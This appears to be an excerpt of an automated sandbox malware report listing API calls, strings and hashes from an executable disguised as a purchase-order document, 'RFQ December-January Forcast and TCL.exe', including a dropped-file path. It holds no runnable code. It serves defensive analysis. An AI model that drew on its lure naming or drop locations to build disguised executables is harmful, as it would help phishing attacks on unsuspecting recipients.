                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                              • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                            • CreatePopupMenu.USER32 ref: 00405580
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                            • EmptyClipboard.USER32 ref: 0040561B
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                            • CloseClipboard.USER32 ref: 00405676
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                            • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                            • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                            • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                            • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                              • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                              • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                              • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                              • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                              • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                            • API String ID: 2624150263-3131679198
                                                                                                            • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                            • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                            • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                            • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                            APIs
                                                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4227406936-0
                                                                                                            • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                            • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                            • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                            • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                            • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                            • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                            • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                            • GetSysColor.USER32(?), ref: 00404396
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                            • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                            • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                            • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                            • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: -B@$Call$N$open
                                                                                                            • API String ID: 3615053054-1446803726
                                                                                                            • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                            • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                            • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                            • wsprintfA.USER32 ref: 00405DFB
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                            • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                                                                            • API String ID: 222337774-899692902
                                                                                                            • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                            • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                            • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                            • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID: @Hmu
                                                                                                            • API String ID: 4216380887-887474944
                                                                                                            • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                            • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                            • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                            • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                            • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                            • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                            Strings
                                                                                                            • *?|<>/":, xrefs: 0040633B
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                            • "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe", xrefs: 0040632D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-2681497619
                                                                                                            • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
